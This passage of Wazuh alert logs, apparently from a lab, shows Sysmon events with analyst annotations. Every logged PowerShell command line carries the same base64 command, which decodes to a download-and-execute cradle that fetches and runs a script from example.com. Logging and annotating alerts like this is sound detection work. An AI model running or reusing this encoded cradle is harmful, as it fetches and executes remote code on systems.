ProcessGuid: {94294ddc-bdb5-680a-b50b-000000000e00}
ProcessId: 4872
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdb3-680a-b30b-000000000e00}
ParentProcessId: 10488
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:49.622 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdb5-680a-b50b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 4872 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdb3-680a-b30b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 10488 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 99 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534393.1922075 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:50.7752700Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285522 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:50.758
ProcessGuid: {94294ddc-bdb5-680a-b50b-000000000e00}
ProcessId: 4872
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_rhjxvxaz.15p.ps1
CreationUtcTime: 2025-04-24 22:39:50.758
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:50.758 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdb5-680a-b50b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 4872 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_rhjxvxaz.15p.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:50.758 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 100 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534396.1924840 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:53.8734294Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285544 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:53.831
ProcessGuid: {94294ddc-bdb8-680a-b70b-000000000e00}
ProcessId: 3664
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_nilkcvgi.iyi.ps1
CreationUtcTime: 2025-04-24 22:39:53.831
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:53.831 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdb8-680a-b70b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 3664 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_nilkcvgi.iyi.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:53.831 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 96 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534396.1927605 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:53.6430596Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285543 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:52.022
ProcessGuid: {94294ddc-bdb8-680a-b70b-000000000e00}
ProcessId: 3664
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdb5-680a-b50b-000000000e00}
ParentProcessId: 4872
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:52.022 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdb8-680a-b70b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 3664 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdb5-680a-b50b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 4872 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 97 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534398.1935668 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:56.4053078Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285565 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:55.189
ProcessGuid: {94294ddc-bdbb-680a-b90b-000000000e00}
ProcessId: 12340
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdb8-680a-b70b-000000000e00}
ParentProcessId: 3664
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:55.189 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdbb-680a-b90b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12340 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
